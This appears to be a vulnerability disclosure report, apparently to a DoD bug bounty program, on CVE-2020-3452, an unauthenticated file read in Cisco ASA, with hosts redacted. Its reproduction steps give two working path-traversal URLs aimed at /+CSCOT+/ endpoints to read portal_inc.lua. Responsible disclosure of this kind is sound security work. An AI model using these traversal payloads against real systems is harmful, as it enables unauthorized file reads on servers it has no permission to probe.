[CVE-2020-3452] Unauthenticated file read in Cisco ASA

I found out that https://███/ was vulnerable to CVE-2020-3452. The IP has a SSL certificate pointing to DoD. `curl -kv https://██████████/` Output: ``` Server certificate: * subject: █████ ``` ## Impact Anyone can read any file present on the server. ## System Host(s) ████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce You can test it by visiting the URL: https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ https://███████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua ## Suggested Mitigation/Remediation Actions https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86